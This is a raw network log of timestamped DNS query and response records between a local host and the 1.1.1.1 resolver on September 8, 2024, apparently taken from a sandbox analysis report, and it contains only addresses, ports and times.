                                                                                                                                                                                                            Sep 8, 2024 09:00:01.253353119 CEST5469953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.255131006 CEST53627781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.255132914 CEST6223953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.255809069 CEST5908053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.257371902 CEST5843853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.258687973 CEST53626141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.259154081 CEST53550351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.259917974 CEST53521201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.260690928 CEST53593581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.263561010 CEST53546991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.264461040 CEST53622391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.265959978 CEST53590801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.268007040 CEST53584381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.272078991 CEST53605131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.278805017 CEST53649381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.281428099 CEST5845053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282286882 CEST5320053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282738924 CEST6278953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282779932 CEST4990053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282977104 CEST6543053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.283293009 CEST5955753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.283459902 CEST5038553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289261103 CEST5547153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289637089 CEST6228853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289838076 CEST4918153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289994001 CEST6527453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290208101 CEST4950153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290237904 CEST6039753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290419102 CEST5618353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290524960 CEST5819653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290808916 CEST5971053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290915966 CEST53584501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291017056 CEST6359053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291254997 CEST6196353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291454077 CEST5354953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291634083 CEST5239053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292186022 CEST6161253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292341948 CEST5611453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292396069 CEST53627891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292732954 CEST6276853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292732954 CEST5474253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292829990 CEST6162253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293030024 CEST5580753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293040037 CEST53503851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293198109 CEST5394453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293204069 CEST53499001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293353081 CEST5483753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293499947 CEST53532001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293973923 CEST5553253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.294289112 CEST5396353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.294509888 CEST5269253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.295867920 CEST6340553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296062946 CEST4983353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296401978 CEST5601353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296578884 CEST5482553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296753883 CEST4940053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296969891 CEST5661953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.297125101 CEST5658753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.297286034 CEST5431053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.298943996 CEST53595571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.299544096 CEST53622881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300000906 CEST53652741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300158978 CEST5572253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300290108 CEST53619631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300395966 CEST6291253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300646067 CEST53561831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300983906 CEST53535491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.301155090 CEST53597101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.302083969 CEST53616221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.302841902 CEST53654301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.302870989 CEST53635901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.302881002 CEST53547421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.302946091 CEST53627681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.303736925 CEST53558071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.303848028 CEST53539631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.304224014 CEST53548371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.304382086 CEST53561141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.305896997 CEST53494001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.305941105 CEST53491811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.306325912 CEST53498331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.306335926 CEST53548251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.306346893 CEST53581961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.306391001 CEST53603971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.306689978 CEST53560131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.307492018 CEST53555321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.307895899 CEST53566191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.309000015 CEST53616121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.309026957 CEST53539441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.309305906 CEST53557221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.313081980 CEST53523901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.314855099 CEST53565871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.316463947 CEST53543101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.319163084 CEST53629121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.319174051 CEST53554711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.321038008 CEST53495011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.325036049 CEST53526921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.376267910 CEST53566871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.409109116 CEST53511721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.458170891 CEST53634051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.581588984 CEST5673553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.586479902 CEST5447453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.120301962 CEST53523871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.127940893 CEST53582041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.130295038 CEST6191153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.140973091 CEST5729653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.145796061 CEST5781453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.148029089 CEST4945753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.149658918 CEST4929753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.151408911 CEST6320553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.151626110 CEST53572961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.154128075 CEST5008053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.157718897 CEST5965053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.159827948 CEST5842453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.159987926 CEST53492971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.160896063 CEST53494571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.161926031 CEST53619111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.165324926 CEST53500801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.167094946 CEST5620053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.167557955 CEST5519053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.167728901 CEST5625153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.168057919 CEST53596501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.169568062 CEST53584241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.177028894 CEST53551901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.177426100 CEST53562001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.182686090 CEST5806253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.183371067 CEST5809653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.183870077 CEST5546553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184051037 CEST6280753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184243917 CEST6453353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184406042 CEST5547053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184741020 CEST5871253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185015917 CEST5130153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185261011 CEST5153553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185491085 CEST5763253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185956001 CEST5222253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.190890074 CEST6280653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.191553116 CEST6518753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.192548990 CEST6318253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.193093061 CEST53580621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.193264008 CEST53580961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.194632053 CEST53645331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.194880009 CEST53513011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.195223093 CEST53576321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.195394039 CEST53522221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.195818901 CEST53554651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.199719906 CEST53628061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.200544119 CEST53628071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.200639963 CEST53515351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.201695919 CEST53631821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.203039885 CEST53562511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.203263998 CEST53587121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.207386017 CEST53651871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.218518972 CEST5031253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.219914913 CEST6278753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.220276117 CEST5147453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.227406979 CEST53503121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.231252909 CEST53627871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.239567041 CEST53643321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.251296043 CEST53514741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.313216925 CEST53632051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.344110966 CEST53554701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.377217054 CEST5883453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.378781080 CEST5722853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381547928 CEST6519753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381710052 CEST5177653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381757975 CEST6046953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381925106 CEST5884153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.382033110 CEST6464253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.382110119 CEST6028753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.388503075 CEST53588341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.389029026 CEST53572281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.392374039 CEST53588411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.392684937 CEST53651971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.397969961 CEST53602871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.398108959 CEST53646421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.399997950 CEST53604691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.407325983 CEST53578141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.412967920 CEST53517761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.528510094 CEST6313553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.529782057 CEST6522153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.530505896 CEST4919853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.530806065 CEST4950453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531073093 CEST5700153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531233072 CEST6336853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531375885 CEST5742053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531652927 CEST5357753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535439014 CEST6370253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535932064 CEST5792053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.536003113 CEST6283553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.536340952 CEST5058853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.539957047 CEST53491981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.540894985 CEST53574201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.540951014 CEST53633681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.541393042 CEST53535771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.541454077 CEST5171153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.541697025 CEST5195653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.541937113 CEST53495041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.542828083 CEST6198853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.543570042 CEST6500353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.543843985 CEST53637021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544018030 CEST6069053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544109106 CEST5526253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544194937 CEST5844653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544372082 CEST5824253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.545820951 CEST53628351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.546710968 CEST53505881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.488648891 CEST5783253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.499950886 CEST53578321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.501502991 CEST53508811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.691389084 CEST6275353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.695019007 CEST5188553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.696173906 CEST5424853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.697750092 CEST5123653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.701677084 CEST6471553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703326941 CEST5132953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703948975 CEST5261353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.704687119 CEST5828553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705410004 CEST5604253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705952883 CEST5453453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.706546068 CEST6549953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.707727909 CEST6304053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.709768057 CEST5011653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.711961985 CEST5240653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.714731932 CEST6444053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.715356112 CEST5666053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.716278076 CEST5178353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.717758894 CEST5503253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.719320059 CEST5246353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.720448017 CEST5126753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.722062111 CEST5617253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.723752022 CEST6388953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.725835085 CEST5177053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.727046013 CEST5499253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.729923010 CEST6053353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.730540991 CEST6521753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.732429028 CEST5265053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.733490944 CEST6015353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.735172987 CEST6294153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.736828089 CEST5462853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.738667011 CEST5283953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.740394115 CEST5926853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.742360115 CEST6349353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.743976116 CEST5007053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.745595932 CEST5400653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.747392893 CEST5476753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.748961926 CEST5557453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.750879049 CEST6163653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.752198935 CEST5648353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.753921032 CEST5189153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.754513979 CEST6254953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.757196903 CEST5391653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.759042978 CEST5531553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.760776043 CEST5961753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.761614084 CEST6229353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.763737917 CEST6018753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.765528917 CEST5495753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.767229080 CEST5255953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.768727064 CEST6457653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.771513939 CEST5236253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.773401022 CEST6418453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.774806023 CEST6331753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.776549101 CEST6515653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.777193069 CEST6079653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.778660059 CEST6409953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.780349970 CEST5240853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.781853914 CEST6040253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.783545017 CEST5217153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.785105944 CEST5549453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.787352085 CEST5673553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.788901091 CEST6434453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.789273024 CEST5244853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.792933941 CEST5178053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.793564081 CEST6136853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.892139912 CEST53545341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.892748117 CEST53560421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893079042 CEST53555741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893090010 CEST53644401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893099070 CEST53524061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893215895 CEST53630401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893373013 CEST53528391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893528938 CEST53501161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893672943 CEST53500701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893820047 CEST53564831.1.1.1192.168.2.4
